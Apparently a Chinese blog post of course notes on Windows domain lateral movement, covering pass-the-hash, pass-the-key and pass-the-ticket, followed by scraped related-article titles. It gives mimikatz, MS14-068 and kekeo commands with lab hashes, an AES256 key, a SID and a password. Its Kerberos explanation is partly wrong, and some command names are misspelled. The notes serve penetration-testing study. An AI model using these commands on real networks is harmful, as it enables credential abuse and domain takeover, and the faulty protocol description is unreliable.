内网渗透-PTH&PTT&PTK

!–看小迪老师课程自己做的笔记
!–之前gitee图床出问题了,部分图片实在找不到了,想深入研究可以去看小迪老师课程

一、kerberos协议具体工作方法

1、客户机将明文密码进行NTLM哈希,然后和时间戳一起加密(使用krbtgt密码hash作为秘钥),发送给kdc(域控),kdc对用户进行检测,成功之后创建TGT

2、将TGT进行加密签名返回给客户机,只有域用户(krbtgt)才能读取kerberos中的TGT数据

3、客户机将TGT发送给域控制器KDC请求TGS(票证授权服务)票证,并且对TGT进行检测

4、检测成功后,将目标服务账户的NTLM以及TGT进行加密,将加密后的结果返回给客户机。

PTH:利用lM或者NTLM的值进行的渗透测试

PTT:利用票据凭证TGT进行的渗透测试

PTK:利用ekeys aes256进行的渗透测试

总结:KB2871997的影响

PTH:没打补丁前任意用户都可以连接,打了补丁只能使用administrator连接

PTK:打了补丁才能任意用户连接,采用aes256连接

PTT:ptt攻击不是简单的NTLM认证了,他是利用kerberos协议进行攻击。MS14-068攻击,允许域内任何一个普通用户,将自己的权限提升至域管理员权限。

二、使用PTH域横向移动---->Mimikatz (未打补丁KB2871997)

注意:当禁用了NTLM认证,psexec、smbexec等无法利用NTLM hash远程连接,但是使用mimikatz依然可以攻击成功。

PTH-ntlm传递(未打补丁KB2871997)

域管理员连接

sekurlsa::pth /user:administrator /domain:ghy /ntlm:d4a1605da045ea9ea9873e349dabbbfe
#弹出的cmd窗口执行
dir \\计算机名\c$

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-FB7rMpTW-1666783160176)(https://gitee.com/gaohongyu1/csdn/raw/master/image-20220706193041187.png)]

域普通用户连接

sekurlsa::pth /user:websec /domain:ghy /ntlm:0778dc8266297ac5062bfa47156499c9
#弹出的窗口执行
dir \\DC.ghy.com\c$

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-IXKXtbmP-1666783160176)(https://gitee.com/gaohongyu1/csdn/raw/master/image-20220706195918045.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-dq6to8Xh-1666783160177)(https://gitee.com/gaohongyu1/csdn/raw/master/image-20220706195937233.png)]

工作组连接

sekurlsa::pth /user:administrator /domain:WORKGROUP /ntlm:0778dc8266297ac5062bfa47156499c9
#弹出窗口执行
dir \\192.168.139.131\c$
dir \\webserver.ghy.com\c$

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-3MntCZ7Q-1666783160178)(https://gitee.com/gaohongyu1/csdn/raw/master/image-20220706200523112.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-cJJuN62H-1666783160178)(https://gitee.com/gaohongyu1/csdn/raw/master/image-20220706200543281.png)]

三、使用PTK域横向移动---->Mimikatz(打补丁KB2871997)

pth ntlm administrator传递

sekurlsa::pth /user:administrator /domain:ghy /ntlm:d4a1605da045ea9ea9873e349dabbbfe

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-yddOSHd6-1666783160180)(https://gitee.com/gaohongyu1/csdn/raw/master/image-20220706204208356.png)]

ptk aes256 传递

#aes256 获取
sekurlsa::ekeys
sekurlsa::pth /user:websec /domain:ghy /aes256:d61a2e608802a77332b4d98923052b0182e2592e28039d756dc402a12f09a8a9

ptt 票证传递

kist   查看票证
kist /purge   清除票证

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-pMqK5PKP-1666783160180)(https://gitee.com/gaohongyu1/csdn/raw/master/image-20220708194802306.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-fHO59tcI-1666783160181)(https://gitee.com/gaohongyu1/csdn/raw/master/image-20220708194927815.png)]

whoami /user   查看用户sid

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-SBCI8Wkf-1666783160181)(https://gitee.com/gaohongyu1/csdn/raw/master/image-20220708195020452.png)]

1、利用MS14-068漏洞,实现普通用户直接获取域控system权限

mimikatz # kerberos::purge    清除当前机器中的凭证
mimikatz # ketberos::list     查看当前机器凭证
ms14-068.exe -u websec@ghy.com -s S-1-5-21-3451611406-1810481340-3913844723-1105 -d 192.168.139.131 -p ghy.00925   生成TGT数据
mimikatz # kerberos::ptc 票据文件    将票据注入内存中

2、利用kekeo

kekeo "tgt::ask" /user:websec /domain:ghy.com /ntlm:0778dc8266297ac5062bfa47156499c9生成票据
kerberos::ptt 票据文件@ghy.com.kirbi    导入数据

内网渗透-PTHPTTPTK相关推荐

  1. 5.内网渗透之PTHPTTPTK

    ---------------------------------------------- 本文参考自三好学生-域渗透系列文章 内网渗透之PTH&PTT&PTK PTH(pass-t ...

  2. kali扫描内网ip_来,我们聊聊内网渗透!

    文章来源:Admin Team 0x00 前言 前段时间再看 metasploit 和白帽子讲 Web 安全,就一直想自己搭个从 Web 端渗透进入内网的环境玩一下,不过因为不太懂计网的知识,拓扑图也 ...

  3. [原创]K8域控植入脚本生成器(内网渗透/RPC不可用解决方案)

    [原创]K8域控植入脚本生成器(内网渗透/RPC不可用解决方案) 参考文章: (1)[原创]K8域控植入脚本生成器(内网渗透/RPC不可用解决方案) (2)https://www.cnblogs.co ...

  4. 红蓝对抗 linux内网渗透

    目录 一.前言 二.提权 2.1 利用内核漏洞进行提权 2.2 利用文件权限配置不当进行提权 2.3 利用SUID程序进行提权 三.隧道 3.1 SSH 3.2 nc/ncat 3.3 portmap ...

  5. 内网渗透测试:NTLM Relay攻击分析

    目录 基础知识 NTLM认证过程 NTLM中继攻击原理 获得Net-NTLM Relay的思路 利用LLMNR和NetBIOS欺骗获得Net-NTLMHash 利用WPAD劫持获得Net-NTLMHa ...

  6. 内网渗透测试:内网信息收集与上传下载

    在之前的几节中,我们讲了隐藏通讯隧道技术的运用,那其实都是渗透测试的后话,接下来要讲的信息收集才是内网渗透的基础. 可以说内网渗透测试,其本质就是信息收集.信息收集的深度,直接关系到内网渗透测试的成败 ...

  7. 安全学习概览——恶意软件分析、web渗透、漏洞利用和挖掘、内网渗透、IoT安全分析、区块链、黑灰产对抗...

    1 基础知识 1.1 网络 熟悉常见网络协议: https://www.ietf.org/standards/rfcs/ 1.2 操作系统 1.3 编程 2 恶意软件分析 2.1 分类 2.1.1 木 ...

  8. 【内网渗透工具】炫彩蛇安装教程

    点击查看[学习资料] Viper是一款图形化内网渗透工具,将内网渗透过程中常用的战术及技术进行模块化及武器化. Viper基础功能已集成杀软绕过,内网隧道,文件管理,增强命令行等基础功能. Viper ...

  9. 【内网渗透】利用非常规手段突破安全策略上线CS

    前言 本文为一篇利用非常规手段突破安全策略的内网渗透记录 [查看资料] 环境简述&说明 web打点getshell,webshell是冰蝎,权限为.net,权限很低,服务器为server 20 ...

最新文章

  1. 使用VC 2010制作和使用静态库
  2. 25、Java Swing文本编辑器的实现
  3. Android开发之自定义ImageView圆角图片的方法
  4. eclipse 与 tomcat 的那些路径
  5. JavaScript-引入JavaScript
  6. ArchLinux学习之环境变量
  7. 从“她经济”到“TA经济“——美妆行业营销报告
  8. C#LeetCode刷题之#933-最近的请求次数(Number of Recent Calls)
  9. docker cp :用于容器与主机之间的数据拷贝
  10. c#划分目录和文件(小白的一点经验)
  11. ASP.NET MVC5+EF6+EasyUI 后台管理系统(27)-权限管理系统-分配用户给角色
  12. 零基础怎么开启编程之路 -(第1期)
  13. day01--课后练习
  14. maven命令-P 参数引发的思考
  15. centos ping 路由_centos服务器怎么ping 命令
  16. 计算机网络--使用网络协议分析器捕捉和分析协议数据包
  17. 【产品】 产品设计之结构设计:注塑件产生气纹的原因
  18. EXCEL透视后 调整列的顺序 如:1月 2月 3月 手动调整顺序
  19. iphon13是双卡双待吗 苹果13是5g吗
  20. 了解 TCP 系统调用序列

热门文章

  1. matlab fisher检验,FISHER线性判别MATLAB实现.doc
  2. Excel的常用快捷键
  3. 【程序员如何买基金 六】买卖指数基金的合适时机
  4. android7.0后台,安卓7.0带来一键清理后台 真能使手机变快吗
  5. 使用eclipse创建一个web登录界面项目
  6. 网易乐得数据库及运维分享会
  7. nginx配置多个一级域名https访问的配置
  8. 苹果App Store审核指南中文翻译(更新)
  9. marker 上的气泡 callout属性设置无效
  10. 数据库之Mysql索引、事务与存储引擎